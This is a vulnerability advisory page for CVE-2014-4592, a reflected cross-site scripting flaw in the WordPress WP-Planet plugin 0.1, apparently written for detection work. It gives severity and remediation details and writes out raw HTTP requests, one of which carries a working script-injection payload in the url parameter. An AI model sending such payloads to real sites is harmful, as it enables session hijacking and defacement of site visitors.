🔙 목록으로 돌아가기

CVE-2014-4592: WP Planet <= 0.1 - Cross-Site Scripting

TitleWP Planet <= 0.1 - Cross-Site Scripting
Authordaffainfo
SeverityMedium
ImpactAttackers can execute arbitrary scripts in the victim's browser, leading to session hijacking or defacement.
RemediationUpdate to the latest version of WP-Planet plugin that addresses this vulnerability or remove the vulnerable script.
CVSS Score6.1
EPSS Score0.03802
CVE IDCVE-2014-4592
CWE IDCWE-79
Tags cve2014 cve wordpress wp-plugin xss wpscan unauth czepol vuln

🔍 Vulnerability Description

A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.

🌐 HTTP Request

GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Connection: close
Accept-Encoding: gzip
GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-4592.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-4592.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A